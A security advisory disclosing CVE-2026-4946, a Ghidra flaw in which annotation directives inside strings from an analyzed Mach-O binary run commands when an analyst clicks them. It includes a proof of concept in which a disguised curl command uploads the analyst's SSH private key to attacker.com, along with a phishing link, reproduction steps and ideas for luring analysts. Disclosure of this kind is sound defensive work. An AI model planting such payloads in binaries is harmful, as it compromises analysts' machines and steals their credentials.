CVE-2026-4946: NSA Ghidra Auto-Analysis Annotation Command Execution#

A malicious binary can trigger arbitrary command execution in Ghidra when an analyst clicks on auto-generated comments.

AHA! has discovered an issue with Ghidra from the National Security Agency (NSA), and is publishing this disclosure in accordance with AHA!’s standard disclosure policy today, on March 25, 2026. CVE-2026-4946 has been assigned to this issue, based on the original vulnerability disclosure GHSA-mc3p-mq2p-xw6v and demonstrated at a regular AHA! meeting by the discoverers.

This vulnerability is estimated to have a [CVSSv31] rating of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (8.8, High), and the relevant SSVC vectors are Exploitation: PoC and Technical Impact: Total. This issue is an instance of CWE-78.

Any questions about this disclosure should be directed to [email protected].

Executive Summary#

Ghidra versions prior to 12.0.3 improperly process annotation directives embedded in automatically extracted binary data, resulting in arbitrary command execution when an analyst interacts with the UI. Specifically, the @execute annotation—intended for trusted, user-authored comments—is also parsed in comments generated during auto-analysis (such as CFStrings in Mach-O binaries). This allows a crafted binary to present seemingly benign clickable text which, when clicked, executes attacker-controlled commands on the analyst’s machine.

This issue affects Ghidra versions prior to 12.0.3 and represents a failure to properly constrain execution of externally influenced input, consistent with CWE-78.

Technical Details#

Ghidra includes a feature allowing annotations within comments, including an {@execute ...} directive which enables clickable links that execute system commands. This feature is intended for trusted, user-authored annotations.

However, Ghidra’s analysis pipeline applies this same annotation parsing logic to comments automatically derived from analyzed binaries.

The vulnerable code path is as follows:

  1. CFStringAnalyzer extracts string data from Mach-O binaries and generates repeatable comments in the Listing view.
  2. Annotation.java parses all comment text for annotation directives, including {@execute ...}.
  3. ExecutableTaskStringHandler.java executes commands via ProcessBuilder when a user clicks on the rendered annotation, with no confirmation dialog or validation.

Because the extracted CFString data originates from attacker-controlled binary input, an adversary can embed annotation payloads directly into a compiled binary.

A minimal proof-of-concept is shown below:

// poc.m
#import <CoreFoundation/CoreFoundation.h>

// Exfiltrate SSH keys - displays as "View_License"
CFStringRef g1 = CFSTR("{@execute /usr/bin/curl \"-sT/Users/Shared/.ssh/id_rsa http://attacker.com:8888/exfil\" View_License}");

// Open Calculator - displays as "Open_Documentation"  
CFStringRef g2 = CFSTR("{@execute /usr/bin/open -aCalculator Open_Documentation}");

// Create file on disk - displays as "Check_Updates"
CFStringRef g3 = CFSTR("{@execute /usr/bin/touch /tmp/RCE Check_Updates}");

// Open phishing URL - displays as "View_Source"
CFStringRef g4 = CFSTR("{@execute /usr/bin/open https://attacker.com/phishing View_Source}");

int main() { return 0; }

These strings appear in Ghidra’s Listing view as clickable labels such as “View_License” or “Open_Documentation.” When clicked, the embedded command is executed directly on the analyst’s system.

To reproduce:

  1. Compile a Mach-O binary containing CFStrings with embedded @execute annotations.
  2. Open the binary in Ghidra and allow auto-analysis to complete.
  3. Navigate to the __cfstring section in the Listing view.
  4. Click on the rendered comment links.

For more detailed reproduction steps, please see the original advisory from the NSA at GHSA-mc3p-mq2p-xw6v.

Observed results include:

  • Execution of arbitrary binaries (e.g., launching Calculator)
  • File system modification (e.g., creating files under /tmp)
  • Network exfiltration (e.g., sending SSH private keys to a remote listener)

At no point is the user warned that clicking these links will execute system commands, nor is there any restriction on what commands may be executed.

This represents a trust boundary violation between analyzed content and user interface behavior, where untrusted binary data is implicitly treated as trusted annotation input.

Attacker Value#

This vulnerability enables a novel and highly effective attack against reverse engineers and malware analysts. By embedding malicious annotation payloads into distributed binaries, an attacker can reliably achieve code execution on the systems of analysts who inspect those binaries in Ghidra. For example, an attacker could create a binary that intentionally triggers an EDR alert, prompting forensic analysis by a security analyst, which then, in turns, triggers the true payload for the attack. The requirement for user interaction (a click) is minimal, especially given that the UI presents these annotations as benign, helpful labels such as “View License” or “Open Documentation.”

Once compromised, the attacker could perform the following against the analyst’s forensic environment:

  • Exfiltration of sensitive analyst data, such as SSH keys or proprietary binaries
  • Execution of reconnaissance commands to fingerprint the analysis environment
  • Delivery of secondary payloads or persistent backdoors
  • Social engineering through deceptive UI elements that encourage interaction

Exploiting this vulnerability would be particularly effective in environments where analysts routinely inspect untrusted binaries, such as malware research labs, vulnerability research teams, and incident response operations. In these contexts, the ability to pivot from analyzed sample to analyst workstation represents a high-value target for both criminal and espionage actors.

Credit#

This issue is being disclosed through the AHA! CNA and is credited to the Mobasi Security Team.

Timeline#

  • 2026-02-19 (Thu): Vulnerability published as GHSA-mc3p-mq2p-xw6v
  • 2026-02-19 (Thu): Vendor released fixed version 12.0.3
  • 2026-03-27 (Thu): Presented at AHA! Meeting 0x00ea
  • 2026-03-29 (Sun): Published this advisory as CVE-2026-4946